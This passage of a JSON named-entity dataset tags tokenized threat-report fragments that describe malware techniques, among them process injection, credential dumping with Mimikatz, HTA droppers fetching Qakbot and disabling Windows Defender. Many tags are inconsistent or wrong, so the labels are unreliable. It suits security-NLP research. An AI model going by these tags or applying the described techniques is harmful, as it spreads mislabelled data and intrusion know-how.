"ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RPCConnector", "and", "RPCBindConnector" ], "ner_tags": [ "B-Way", "O", "B-Way" ] }, { "tokens": [ "TcpBindConnector", "and", "HttpBindConnector" ], "ner_tags": [ "B-Way", "O", "B-Way" ] }, { "tokens": [ "TcpConnector/TcpBindConnector" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "CreateThread" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "uses", "various", "WinAPI", "functions", "to", "run", "malicious", "shellcode", "in", "the", "current", "process", "or", "to", "inject", "it", "into", "another", "process" ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "finds", "the", "PID", "of", "the", "target", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Current", "processes", "are", "checked" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Name", "of", "running", "module", "PID" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "injects", "shellcode", "into", "it" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "injects", "shellcode", "into", "the", "processes", "explorer.exe,", "winlogon.exe,", "wmplayer.exe,", "svchost.exe,", "and", "spoolsv.exe" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "B-SamFile", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "archive", "was", "distributed" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "unpacks", "an", "HTML" ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "is", "unpacked", "from", "the", "CHM", "file." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "SFX", "archive" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "unpacks", "three", "files" ], "ner_tags": [ "B-Features", "O", "O" ] }, { "tokens": [ "contents", "are", "unpacked" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "SFX", "archiveWhen", "unpacked" ], "ner_tags": [ "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "use", "VMProtect", "or", "custom", "packers", "for", "its", "malware" ], "ner_tags": [ "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "can", "send", "system", "information" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "is", "the", "library", "Funny.dll" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "dynamically", "loads", "the", "library" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "that", "contains", "the", "library", "mapistub.dll," ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "dynamically", "loaded", "from", "a", "Base64", "constant", "defined", "in", "the", "main", "assembly." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "conditional", "jumps", "that", "never", "run", "are", "included" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "with", "junk", "instructions", "and", "inverted", "conditional", "jumps", "(combinations", "of", "jle/jg", "and", "the", "like)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "the", "file", "is", "deleted" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "wiping", "traces", "of", "malware", "from", "the", "system" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "saved", "in", "the", "registry" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "passes", "control", "to", "a.bat." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "cleanup", "script" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "uses", "cmd.exe", "and", ".bat", "files", "to", "run", "commands" ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "phishing", "messages", "with", "malicious", "attachments" ], "ner_tags": [ "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "persists", "on", "infected", "machines", "by", "creating", "new", "services" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "legitimate", "utilities", "to", "load", "DLLs" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "establish", "C2", "connections", "via", "a", "peer-to-peer", "network", "of", "infected", "hosts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "support", "C2", "connections", "via", "an", "external", "HTTP/SOCKS", "proxy" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "using", "the", "API", "RegisterServiceHandlerA", "then", "SetServiceStatus,", "and", "finally", "CreateEventA." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "B-SamFile" ] }, { "tokens": [ "abusing", "API", "calls", "in", "the", "Operating", "System." ], "ner_tags": [ "B-Way", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "also", "decrypts" ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "the", "decryption", "routine" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Decryption", "routine" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "the", "AES", "256", "decryption", "key", "of", "the", "payload" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "strings", "decoded", "when", "running" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "to", "decrypt", "the", "payload", "from", "the", ".dat", "file", "using", "the", "AES-256-CTR", "decryption", "algorithm", "and", "starts", "to", "execute." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injects", "the", "payload", "in", "memory." ], "ner_tags": [ "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "was", "injected", "into", "a", "SVCHOST", "process", "where", "a", "driver", "location", "pointed", "to", "the", "config", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injects", "it", "into", "a", "process." ], "ner_tags": [ "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "a", "process", "injection", "in", "one", "of", "the", "svchost", "processes" ], "ner_tags": [ "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injected", "themselves", "into", "Windows", "Media", "Player" ], "ner_tags": [ "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "injected", "code", "in", "a", "process" ], "ner_tags": [ "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "had", "removed", "the", "payload", "file", "from", "the", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Where", "in", "the", "beginning", "of", "the", "campaign", "the", "adversary", "was", "sloppy,", "during", "the", "last", "months", "of", "activity", "they", "became", "more", "careful", "and", "started", "to", "remove", "evidence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Besides", "the", "use", "of", "Mimikatz", "to", "dump", "credentials," ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "acquired", "through", "the", "use", "of", "Mimikatz,", "or", "creating", "LSASS", "dumps," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "using", "Mimikatz", "and", "dumping", "lsass," ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Using", "Mimikatz", "and", "dumping", "of", "lsass," ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "makes", "use", "of", "the", "technique", "“DLL", "Sideloading”" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "When", "the", "executable", "is", "run,", "the", "DLL", "next", "to", "it", "is", "loaded." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "dll", "is", "run", "using", "the", "command", "“rundll32.exe" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "model", "uses", "the", "persistence", "technique", "utilizing", "svchost.exe", "with", "service.dll", "to", "install", "a", "rogue", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "DLL", "embeds", "several", "obfuscated", "strings" ], "ner_tags": [ "O", "B-SamFile", "B-Features", "O", "O", "O" ] }, { "tokens": [ "was", "to", "start", "a", "program", "as", "a", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "DLL", "is", "used", "to", "create", "a", "malicious", "service" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O" ] }, { "tokens": [ ".", "The", "name", "of", "the", "created", "service,", "“SysmainUpdate”,", "is", "usurping", "the", "name", "of", "the", "legitimate", "service", "“SysMain”", "which", "is", "related", "to", "the", "legitimate", "DLL", "sysmain.dll", "and", "also", "to", "the", "Superfetch", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversary", "installed", "custom", "backdoor", "as", "a", "service" ], "ner_tags": [ "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Adversary", "launched", "backdoor", "and", "some", "tools", "as", "a", "Windows", "Service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "command", "line", "dump", "of", "the", "memory:", "cmd", "/c" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "When", "running", "the", "file", "from", "the", "command", "line," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "some", "cases,", "batch", "(.bat)", "scripts", "were", "created" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "content", "in", "a", "batch", "script:" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "exfiltration", "of", "data", "on", "the", "system,", "such", "as", "OS,", "Processor", "(architecture)," ], "ner_tags": [ "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Username" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "WMI", "activity", "[T1546.003]", "was", "also", "observed", "to", "execute", "commands", "on", "the", "systems." ], "ner_tags": [ "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WMI", "was", "used", "for", "running", "commands", "on", "remote", "systems" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "From", "a", "persistence", "point", "of", "view,", "scheduled", "tasks" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversary", "ran", "scheduled", "tasks", "for", "persistence", "of", "certain", "malware", "samples" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "the", "use", "of", "valid", "accounts" ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "they", "were", "looking", "to", "get", "valid", "accounts." ], "ner_tags": [ "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "the", "adversary", "gained", "credentials", "in", "the", "network" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "files", "were", "exfiltrated", "over", "the", "backdoor" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "data", "was", "stored", "in", "a", "location", "in", "the", "Internet", "Information", "Services", "(IIS)", "web", "server", "and", "exfiltrated", "over", "HTTP", "using", "GET", "requests", "towards", "the", "exact", "file", "paths" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "exfiltrated", "data", "towards", "a", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "the", "data", "was", "gathered", "on", "a", "local", "system", "using", "the", "backdoor" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "and", "the", "rar", "files", "were", "deleted" ], "ner_tags": [ "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "exfiltrated", "over", "HTTP", "using", "GET", "requests" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "traffic", "to", "C2" ], "ner_tags": [ "B-Way", "I-Way", "O", "O" ] }, { "tokens": [ "The", "packet", "data", "was", "customized", "and", "sent", "through", "a", "POST", "request", "with", "several", "headers", "towards", "the", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "started", "to", "open", "up", "both", "UDP", "and", "TCP", "ports", "to", "connect", "with", "a", "C2", "server" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "customized", "packet", "size", "using", "a", "XOR", "value." ], "ner_tags": [ "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversary", "exploited", "a", "web-facing", "server", "with", "application" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "actor", "established", "initial", "access", "by", "compromising", "the", "victim’s", "web", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tools", "were", "transferred", "to", "a", "compromised", "web-facing", "server" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversary", "browsed", "several", "locations", "to", "search", "for", "the", "data", "they", "were", "after." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "Rotten/Bad", "Potato", "to", "elevate", "user", "rights", "by", "abusing", "API", "calls", "in", "the", "Operating", "System." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "including", "adding", "of", "registry", "keys" ], "ner_tags": [ "O", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "and", "lateral", "movement/execution", "of", "files" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "attackers", "would", "launch", "a", "lateral", "movement", "phase,", "using", "default", "Windows", "credentials" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "run", "a", "network", "recognition", "process", "to", "find", "the", "IP", "address", "of", "each", "of", "the", "ATMs" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Features", "B-Purp", "B-Features", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "a", "variety", "of", "encryption", "schemes", "and", "symmetric", "keys." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "to", "install", "AnyDesk", "and", "provide", "remote", "access", "for", "the", "“technician”", "to", "install", "the", "malware." ], "ner_tags": [ "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "All", "captured", "information", "from", "the", "transaction", "is", "saved", "to", "an", "encrypted", "file", "placed", "in", "a", "directory", "previously", "set", "by", "the", "malware", "configuration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Those", "files", "will", "later", "be", "sent", "to", "the", "malware", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Captured", "data", "stored", "in", "the", "uploader", "C2" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sending", "all", "cab", "files", "generated", "from", "the", "stolen", "transactions", "to", "the", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "StartSendScreen,", "StopSendScreen" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "StartSendScreen", "Start", "screen", "capture", "StopSendScreen", "Stop", "screen", "capture" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Download", "a", "file", "from", "the", "remote", "server" ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "StartDownload,", "StopDownload." ], "ner_tags": [ "B-Way", "B-Way" ] }, { "tokens": [ "Shell", "Execute", "a", "specified", "command", "via", "CMD" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "files", "are", "sent", "through", "an", "HTTP", "POST", "request." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Add", "the", "process", "to", "a", "startup", "registry", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malicious", "OneNote", "documents", "to", "entice", "users", "to", "click", "on", "an", "embedded", "file", "to", "download", "and", "execute" ], "ner_tags": [ "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "fake", "message", "to", "lure", "users", "to", "execute", "the", "HTA", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "Upon", "clicking", "the", "Open", "button,", "it", "drops", "the", "HTA", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "it", "prompts", "the", "user", "with", "a", "fake", "message", "to", "double-click", "on", "open", "to", "view", "the", "attachment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "message", "above", "the", "‘Open’", "button", "instructs", "the", "user", "to", "“double", "click”", "in", "order", "to", "receive", "the", "attachment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "malicious", "document", "is", "delivered", "in", "either", "zip", "files", "or", "ISO", "images", "to", "the", "target", "through", "phishing", "emails." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "the", "malware", "author", "used", "phishing", "emails", "to", "deliver", "malicious", "OneNote", "document", "either", "as", "attachment" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "batch", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "executes", "a", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "malicious", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Upon", "execution", "of", "the", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "launched", "by", "cmd.exe" ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "batch", "file" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Embedded", "Executable", "Objects", "In", "OneNote" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "embedded", "file", "gets", "executed", "by", "the", "user" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "FileData", "member", "of", "the", "FileDataStoreObject", "is", "the", "key", "member", "that", "holds", "the", "embedded", "data", "in", "the", "OneNote", "document." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Embedded", "data", "in", "Data", "object" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "OneNote", "file", "contains", "an", "embedded", "HTA", "attachment" ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "The", "OneNote", "file", "with", "the", "embedded", "HTA", "file" ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "contains", "the", "“whoami”", "command" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "make", "use", "of", "the", "curl", "utility", "to", "download", "Qakbot", "and", "then", "execute", "it." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "The", "HTA", "file", "uses", "curl", "utility", "to", "download" ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Curl", "is", "used", "to", "download", "the", "malicious", "DLL", "file" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "script", "will", "then", "execute", "the", "downloaded", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloads", "the", "payload", "from", "the", "Internet", "and", "executes", "on", "the", "target", "system." ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Powershell", "will", "be", "invoked", "and", "it", "fetch", "the", "Qakbot", "payload", "from", "Internet" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "powershell", "to", "download", "the", "payload" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "executed", "by", "rundll32.exe." ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "script", "will", "then", "execute", "the", "downloaded", "file", "with", "Rundll32.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "execute", "it", "with", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Obfuscated", "HTA", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "HTA", "file", "contains", "obfuscated", "script" ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "The", "obfuscated", "registry", "is", "then", "read", "by", "MSHTA", "and", "the", "obfuscated", "code", "is" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "with", "obfuscated", "content" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Deobfuscated", "HTA", "content" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "code", "is", "de-obfuscated" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Base64", "Decoded", "instructions", "in", "dropper" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "The", "base64", "decoded", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "deletes", "the", "registry", "key" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "registry", "key", "in", "HKEY_CURRENT_USER\\SOFTWARE\\" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "A", "closer", "look", "at", "the", "document", "reveals", "the", "graphical", "elements", "are", "all", "images", "placed", "in", "a", "layered", "style", "by", "the", "malicious", "actor." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "enumerate", "files", "and", "folders" ], "ner_tags": [ "O", "B-Features", "O", "O" ] }, { "tokens": [ "It", "then", "performs", "SQL", "queries", "to", "retrieve", "files,", "file", "size,", "folders" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Many", "of", "the", "hosts", "used", "to", "support", "these", "second-stage", "operations", "hosted", "RDP", "services" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "can", "run", "commands", "that", "will", "download", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "web", "shell", "with", "filenames", "that", "masquerade", "as", "human.aspx,", "which", "is", "a", "legitimate", "component", "of", "the", "MOVEit", "Transfer", "software." ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "several", "POST", "requests" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "large", "volumes", "of", "files", "have", "been", "stolen", "from", "victims'", "MOVEit", "transfer", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "also", "moved", "laterally", "to", "the", "domain", "controller,", "compromised", "credentials" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "implanted", "Ngrok", "reverse", "proxies" ], "ner_tags": [ "O", "B-Way", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "Ngrok", "to", "proxy", "RDP", "connections", "and", "to", "perform", "command", "and", "control." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "exploited", "Log4Shell", "[T1190]", "for", "initial", "access", "[TA0001]", "to", "the", "organization’s", "unpatched", "VMware", "Horizon", "server" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "exploited", "Log4Shell", "for", "initial", "access", "to", "the", "organization’s", "VMware", "Horizon", "server." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "added", "an", "exclusion", "rule", "to", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "added", "an", "exclusion", "rule", "to", "Windows", "Defender." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "added", "an", "exclusion", "rule", "to", "Windows", "Defender." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "The", "tool", "allowlisted", "the", "entire", "c:\\drive,", "enabling", "the", "actors", "to", "bypass", "virus", "scans", "for", "tools" ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "manually", "disabled", "Windows", "Defender", "via", "the", "GUI." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "exclusion", "rule", "allowlisted", "the", "entire", "c:\\drive,", "enabling", "threat", "actors", "to", "download", "tools", "to", "the", "c:\\drive", "without", "virus", "scans." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "manually", "disabled", "Windows", "Defender", "via", "the", "Graphical", "User", "Interface", "(GUI)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Scheduled", "Task", "was", "named", "RuntimeBrokerService.exe" ], "ner_tags": [ "O", "O", "O", "O", 